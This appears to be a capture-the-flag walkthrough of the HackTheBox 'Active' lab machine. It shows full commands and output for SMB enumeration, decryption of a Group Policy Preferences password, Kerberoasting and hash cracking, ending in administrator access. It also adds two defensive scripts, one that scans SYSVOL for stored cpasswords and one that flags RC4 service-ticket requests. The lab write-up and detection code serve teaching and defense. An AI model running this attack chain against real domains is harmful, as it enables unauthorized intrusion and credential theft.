Disclaimer
The host penetrated in this article was tested with legal authorization. The tools and methods used here are for learning and exchange only; please do not use the tools or the penetration approach in this article for any illegal purpose. I accept no responsibility for any consequences that arise from doing so, nor for any misuse or damage caused.
Service discovery
Check which ports and services are open
┌──(rootkali)-[~/htb/Active]
└─# nmap -p- 10.10.10.100 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 04:33 EST
Nmap scan report for 10.10.10.100
Host is up (0.30s latency).
Not shown: 65508 closed ports, 4 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49169/tcp open  unknown
49171/tcp open  unknown
49180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 136.09 seconds
Get detailed information on the open ports
┌──(rootkali)-[~/htb/Active]
└─# nmap -sV -T4 -A -O -p 53,88,135,389,445,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49180 10.10.10.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 04:37 EST
Nmap scan report for 10.10.10.100
Host is up (0.29s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-29 09:37:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49180/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-29T09:39:06
|_  start_date: 2021-12-29T09:31:20

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   283.07 ms 10.10.14.1
2   284.19 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.68 seconds
Active Directory (LDAP, Kerberos) and DNS are all present, so this host should be the domain controller.
Start with SMB and enumerate the shares.
┌──(rootkali)-[~/htb/Active]
└─# smbmap -u '' -H 10.10.10.100
[+] IP: 10.10.10.100:445	Name: 10.10.10.100
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
The anonymous (null-session) account can only read Replication.
Log in to that share
┌──(rootkali)-[~/htb/Active]
└─# smbclient --no-pass //10.10.10.100/Replication                                1 ⨯
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018
Download all the files locally for analysis
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Among the downloaded files, this one stands out:
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
It discloses a set of login credentials
┌──(rootkali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>
Username: active.htb\SVC_TGS
cpassword value: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
A Google search for "Groups.xml decrypt"
turns up the tool that decrypts this value: gpp-decrypt
┌──(rootkali)-[~/htb/Active]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
The recovered password is: GPPstillStandingStrong2k18
Check this account's SMB permissions
┌──(rootkali)-[~/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100
[+] IP: 10.10.10.100:445	Name: 10.10.10.100
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
user.txt
Use the following command to log in to the Users share
smbclient -U 'active.htb/SVC_TGS%GPPstillStandingStrong2k18' //10.10.10.100/Users
user.txt is found on the SVC_TGS desktop
smb: \SVC_TGS\Desktop\> pwd
Current directory is \\10.10.10.100\Users\SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018
Mount the shares
Install cifs-utils: apt install cifs-utils
Mount the Users share locally
mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/Users /mnt/users
Change into /mnt/users and run the following command to list every readable file (the -type f test goes before -ls so that only regular files are printed): find . -type f -ls
Mount NETLOGON and SYSVOL locally in the same way
┌──(rootkali)-[~/htb/Active]
└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/NETLOGON /mnt/NETLOGON

┌──(rootkali)-[~/htb/Active]
└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/SYSVOL /mnt/SYSVOL
Change into /mnt/NETLOGON and /mnt/SYSVOL in turn and run: find ./|xargs grep -ri 'password' -l
This finds the same file we already found above
┌──(rootkali)-[/mnt/SYSVOL]
└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml                                                                                    123 ⨯
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>
Apart from that there are no other useful files, so port 445 has nothing more of value.
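The Groups.xml finding above and the grep over the mounted SYSVOL are the same audit a defender should run on every domain: any GPP file that still carries a cpassword attribute is a plaintext credential, because the AES key Microsoft used for it is public (that is what gpp-decrypt relies on). The script below is an added example, not part of the original write-up: a stdlib-only scanner that walks a SYSVOL mount, finds cpassword attributes in the six GPP file types that can carry them, and reports the account and ciphertext length without decrypting anything. The sample XML is the Groups.xml shown above; the mount path /mnt/SYSVOL is taken from this page.

```python
import base64
import os
import xml.etree.ElementTree as ET
# Group Policy Preference files that can carry a cpassword attribute (the MS14-025 exposure).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes naming the account a stored password belongs to, depending on the preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

def find_cpasswords(xml_text):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.attrib.get("cpassword", "")
        if not cpw:
            continue
        # GPP strips the base64 '=' padding; restore it so the ciphertext decodes.
        raw = base64.b64decode(cpw + "=" * (-len(cpw) % 4))
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        findings.append({
            "element": elem.tag,
            "account": account,
            "cipher_len": len(raw),
            # AES-256-CBC output is a multiple of 16 bytes; anything else is a corrupt value.
            "well_formed": len(raw) % 16 == 0,
        })
    return findings

def scan_sysvol(root_dir):
    """Walk a mounted SYSVOL (e.g. /mnt/SYSVOL) and map each GPP file to its cpassword findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    hits = find_cpasswords(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: the Groups.xml shown in this walkthrough, with the same cpassword value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User></Groups>"""

if __name__ == "__main__":
    import sys
    for path, hits in scan_sysvol(sys.argv[1] if len(sys.argv) > 1 else "/mnt/SYSVOL").items():
        print(path, hits)
```

The 86-character value from this page decodes to 64 bytes, which is exactly the 26-character password GPPstillStandingStrong2k18 as UTF-16LE (52 bytes) padded to the next AES block boundary.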
Kerberos
Note that the target also has the Kerberos service open.
Now that we have one account's credentials and know the domain name, we can use GetUserSPNs.py to request service tickets for accounts that have an SPN set.
Command: python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
It returns a ticket hash for the Administrator account
└─# python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d5d94b46d32eed4359851547f776ab30$...
Save it locally and crack it with john
┌──(rootkali)-[~/htb/Active]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:05 DONE (2021-12-29 10:06) 0.1964g/s 2070Kp/s 2070Kc/s 2070KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(rootkali)-[~/htb/Active]
└─# john --show hashes.kerberoast
?:Ticketmaster1968

1 password hash cracked, 0 left
The cracked password is: Ticketmaster1968
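The ticket request above leaves a trace on the domain controller: a Security Event ID 4769 (service ticket requested) whose encryption type is 0x17, the RC4 "etype 23" that john reported, for a user account with an SPN. The script below is an added detection example, not part of the original write-up. It works on constructed records whose field names mirror the 4769 event (account_name, service_name, client_address, ticket_encryption_type, failure_code); the records themselves are made up, only the SVC_TGS and Administrator names and the 10.10.14.1 address come from this page, and the min_services threshold is an assumed tuning knob.

```python
from collections import defaultdict

# Kerberos encryption types whose service tickets are crackable offline as shown above:
# 0x17 = RC4-HMAC (john's "etype 23"), 0x18 = RC4-HMAC-EXP.
RC4_ETYPES = {"0x17", "0x18"}

def is_roastable_request(ev):
    """True for a successful TGS request for a user-style service account issued with RC4."""
    svc = ev["service_name"]
    return (ev["failure_code"] == "0x0"
            and ev["ticket_encryption_type"] in RC4_ETYPES
            and not svc.endswith("$")        # machine accounts have long random passwords
            and svc.lower() != "krbtgt")     # every TGT renewal names krbtgt; not a roast

def kerberoast_candidates(events, min_services=1):
    """Group roastable requests by (requesting account, client IP) and keep the requesters
    that touched at least min_services distinct service accounts."""
    by_requester = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            by_requester[(ev["account_name"], ev["client_address"])].add(ev["service_name"])
    return {k: sorted(v) for k, v in by_requester.items() if len(v) >= min_services}

# Constructed sample records using the field names of Security Event ID 4769
# (service ticket requested); these are not logs captured from the target.
SAMPLE_4769 = [
    {"account_name": "SVC_TGS@ACTIVE.HTB", "service_name": "Administrator",
     "client_address": "10.10.14.1", "ticket_encryption_type": "0x17", "failure_code": "0x0"},
    {"account_name": "SVC_TGS@ACTIVE.HTB", "service_name": "DC$",
     "client_address": "10.10.14.1", "ticket_encryption_type": "0x12", "failure_code": "0x0"},
    {"account_name": "DC$@ACTIVE.HTB", "service_name": "krbtgt",
     "client_address": "10.10.10.100", "ticket_encryption_type": "0x12", "failure_code": "0x0"},
    {"account_name": "alice@ACTIVE.HTB", "service_name": "sqlsvc",
     "client_address": "10.10.14.7", "ticket_encryption_type": "0x17", "failure_code": "0x0"},
    {"account_name": "alice@ACTIVE.HTB", "service_name": "websvc",
     "client_address": "10.10.14.7", "ticket_encryption_type": "0x17", "failure_code": "0x0"},
]

if __name__ == "__main__":
    for (who, ip), services in kerberoast_candidates(SAMPLE_4769).items():
        print(f"{who} from {ip} requested RC4 service tickets for: {', '.join(services)}")
```

A single RC4 ticket for one SPN (the SVC_TGS record) is what this box produces; raising min_services catches the bulk-request pattern at the cost of missing a targeted request like that one.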
root.txt
Log in to the C$ share as Administrator:Ticketmaster1968
┌──(rootkali)-[~/htb/Active]
└─# smbclient -U 'active.htb/Administrator%Ticketmaster1968' //10.10.10.100/C$
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Mon Jul 13 22:34:39 2009
  Config.Msi                        DHS        0  Mon Jul 30 10:10:06 2018
  Documents and Settings          DHSrn        0  Tue Jul 14 01:06:44 2009
  pagefile.sys                      AHS 4294434816  Wed Dec 29 08:59:57 2021
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Wed Jul 18 14:44:51 2018
  Program Files (x86)                DR        0  Thu Jan 21 11:49:16 2021
  ProgramData                       DHn        0  Mon Jul 30 09:49:31 2018
  Recovery                         DHSn        0  Mon Jul 16 06:13:22 2018
  System Volume Information         DHS        0  Wed Jul 18 14:45:01 2018
  Users                              DR        0  Sat Jul 21 10:39:20 2018
  Windows                             D        0  Mon Jul 30 09:42:18 2018
Retrieve root.txt from the Administrator desktop
smb: \users\Administrator\desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                            A       34  Sat Jul 21 11:06:07 2018